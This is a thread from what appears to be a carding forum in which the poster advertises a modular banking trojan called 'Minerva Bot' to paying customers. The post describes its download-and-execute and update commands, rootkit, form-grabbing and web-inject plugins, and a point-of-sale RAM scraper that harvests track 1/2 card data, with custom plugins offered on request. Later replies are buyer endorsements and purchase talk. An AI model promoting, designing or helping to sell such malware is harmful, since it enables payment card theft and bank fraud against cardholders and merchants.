Minerva Bot : Modular Trojan [Pos Plugin]

Xehanort

Carder
Reaction score
Hello, members of c.pro community if you can recall a few months back I was working on a personal project alongside a few coder buddies and quite a few of you inquired about what it was. Well after months and months of coding we have finalized the core base and a couple plugins. You guys will also be happen to know about the POS plugin that has been ported and working 100%. :rocks

I also want to point out how disgusting it is that we have some "sellers" of malware here, I can assure you not one of them is the coder for it nor can they provide consistent updates and support. It's most times modded crapware. Anyhow, this is also another reason we decided to assert our project into this board is to eliminate shitty projects such as those and let them try to compete with something as advanced as this. :)
------

Minerva Bot : Modular Trojan

Basic Commands (commands.php):
If one of the commands has a "http://" in it then it IS required, function will fail without it.

Command Type: Example Syntax

Visit Website: vweb http://google.com/index.html
Visit Website (Stealth): vstealth http://google.com/index.html
Download And Exec (.exe only): down http://example.com/file.exe
Update Bot (.exe only): update http://example.com/update.exe
Remove Bot: remove

Plugins (plugins.php):
All of the plugins for Minerva are loaded externally and are NOT stored on HD (no crypting of plugins needed).

Current plugins being worked on:
FormGrabber (IE/FF/CH) SSL and non SSL
FTP Grabber (Uses hooks to grab FTP logins)
Ring-3 Rootkit (Compatible with x64 and x86)
Ring-0 Rootkit (Alternative to Ring-3 kit however a lot of work still needs to be done)
Reverse Socks5 (No need to worry about NAT or Routers, works on 100% of bots)
Botkill (Will kill all other malware on OS)
Web Injects (IE/FF/CH) SSL and non SSL

Current finished plugins:
Advanced RAM Algo Resort Scraper for TRACK 1/2 data (Data gets uploaded to panel)

----------
The POS malware plugin is quite extensively different from the rest, not crapshare leaked source being continuously modified. :)

Furthermore; there will be custom plugins that can be made on demand--for example a different client asked "Can you make it so it only gives me Brazil dumps on panel and ignores rest." Yeah, that's very possible and can be done so anything extra can be ported as plugin upon request. :rocks

You will also be happy to know that this was done from the base up, and without the C runtime library so it's much be more efficient and effective.

--------
Pricing & License:

Currently the project is in it's early stages, it's fullest potential will be exceeding the likes of existing trojans such as Zeus/Spyeye was; so yes this will be a Banking Trojan/Loader with a modular plugin system. This way you can have all your data thoroughly organized with one net, and not different cluttered subnets. :)

We are constantly working on making new updates and plugins as mentioned above. In the meantime we will choose a handful of certain customers who would like to engage activity with the bot in it's early stages.

License will be one-time valid token, and you will receive support and solutions on your problematic situations. Furthermore, NO SHARING of the license is allowed; if found we will terminate all licensing and support. :)

Pricing is to be discussed via jabber, so please contact me via PM by leaving the jabber there and I will reach out to you.

Note: It can take up to 12 hours till I respond, so don't spam inbox please

Last edited:

nsn

Professional
Reaction score
Good luck, A+++ I know lots of time and brains went into this. Professional guy!

msrv

Reaction score
Good guy, knowledgeable.
I am placing order.
Thank you.

G00DFELLA

Professional
Reaction score
Screenshots?

Xehanort

Carder
Reaction score
Thank You all for the support, its greatly appreciated.

G00DFELLA, a video will actually be released soon in the coming days depicting a little bit of Minerva. Thanks for the interest!

tommy23

Carder
Reaction score
good guy , very professional, soon i buy minerva license.... good luck man :rocks

p3rito

Professional
Reaction score
Good lucky in your business. But remember: be patient, can take maybe 1 or 2 years to your project 'boom' and you start selling real big over the internet. Nothing real big grow up in few months, make your project have a long life... Don't give up in first year if sales don't overcome your first intension!

Xehanort

Carder
Reaction score
Good lucky in your business. But remember: be patient, can take maybe 1 or 2 years to your project 'boom' and you start selling real big over the internet. Nothing real big grow up in few months, make your project have a long life... Don't give up in first year if sales don't overcome your first intension!

Thanks p3rito, you're one of the few members here that i can have full fledged conversation regarding the programming aspect of it.

Always take your advice into considerations; appreciate it! :beer

G00DFELLA

Professional
Reaction score
The number of positive feedbacks is amazing, really waiting for the video, and gonna buy it :)

Xehanort

Carder
Reaction score
The number of positive feedbacks is amazing, really waiting for the video, and gonna buy it :)

Yeah just give me a few days to compile the video; as of now I'm also configuring minor tweaks to the code so it can be more clean. :)

produmps

Reaction score
Already bought license. From 1 to 10 I would give 12 to this person. Great communications, great support, always helpful. I can always count on him.

Xehanort

Carder
Reaction score
Back in business, did some other work.
Will PM everyone back, give me 24-48hrs. Thanks.